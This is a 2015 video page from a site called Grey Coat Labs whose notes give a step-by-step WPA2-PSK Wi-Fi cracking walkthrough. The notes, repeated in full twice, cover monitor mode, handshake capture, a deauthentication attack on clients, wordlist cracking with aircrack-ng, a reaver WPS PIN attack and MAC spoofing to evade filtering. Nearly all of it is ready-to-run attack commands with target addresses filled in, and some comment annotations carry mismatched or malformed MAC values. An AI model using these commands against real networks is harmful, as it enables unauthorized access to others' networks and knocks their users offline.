WPA2-PSK Cracked Demo by Digitalized Warfare 🔓
Community member Digitalized Warfare demonstrates WPA2-PSK cracking. Visit us for more tech insights and articles.

Grey Coat Labs
213 views • Jan 31, 2015

About this video
Contributed by community member Digitalized Warfare @DigiWarfare . If your interested in more interesting articles and information please visit us at https://www.greycoatlabs.com or forums.greycoatlabs.com
Notes from video:
Turn on Monitoring :
airmon-ng start wlan0
Capture 4way Handshake to file :
airodump-ng --bssid 9C:D3:6D:9C:90:42 -c 6 -w /root/DEMOS/WPA2-Cracking/target mon0
Deauth Clients :
aireplay-ng -0 30 -a 9C:D3:6D:9C:90:42 -c 64:A3:CB:57:C0:A4 mon0
# -0 = deauth attack
# 30 = number of deauth packets
# -a 00:14:BF:09:6F:C1 = the bssid of the wifi network
# -c 00:23:4D:BF:DA:FB = address of client on the network
# mon0 = our network interface
Crack the Password
aircrack-ng target-01.cap -w /root/DEMOS/WPA2-Cracking/word_list.txt
Check for WPA
wash -i mon0 --ignore-fcs
Exploit Pin Hack With Reaver
reaver -i mon0 -b 9C:D3:6D:9C:90:42 -l -S -w --pin 62901150 -vv
# -I mon0 = interface to listen on
# -b 20:E5:2A15:BB:6A = bssid of access point
# -l = enable lock delay
# -vv = verbose login x2
Deal with Mac List
Change From : 64:80:99:49:4d:c8
To : 64:A3:CB:57:C0:A4
macchanger --mac=64:A3:CB:57:C0:A4 wlan1
Notes from video:
Turn on Monitoring :
airmon-ng start wlan0
Capture 4way Handshake to file :
airodump-ng --bssid 9C:D3:6D:9C:90:42 -c 6 -w /root/DEMOS/WPA2-Cracking/target mon0
Deauth Clients :
aireplay-ng -0 30 -a 9C:D3:6D:9C:90:42 -c 64:A3:CB:57:C0:A4 mon0
# -0 = deauth attack
# 30 = number of deauth packets
# -a 00:14:BF:09:6F:C1 = the bssid of the wifi network
# -c 00:23:4D:BF:DA:FB = address of client on the network
# mon0 = our network interface
Crack the Password
aircrack-ng target-01.cap -w /root/DEMOS/WPA2-Cracking/word_list.txt
Check for WPA
wash -i mon0 --ignore-fcs
Exploit Pin Hack With Reaver
reaver -i mon0 -b 9C:D3:6D:9C:90:42 -l -S -w --pin 62901150 -vv
# -I mon0 = interface to listen on
# -b 20:E5:2A15:BB:6A = bssid of access point
# -l = enable lock delay
# -vv = verbose login x2
Deal with Mac List
Change From : 64:80:99:49:4d:c8
To : 64:A3:CB:57:C0:A4
macchanger --mac=64:A3:CB:57:C0:A4 wlan1
Tags and Topics
Browse our collection to discover more content in these categories.
Video Information
Views
213
Likes
2
Duration
6:32
Published
Jan 31, 2015
Related Trending Topics
LIVE TRENDSRelated trending topics. Click any trend to explore more videos.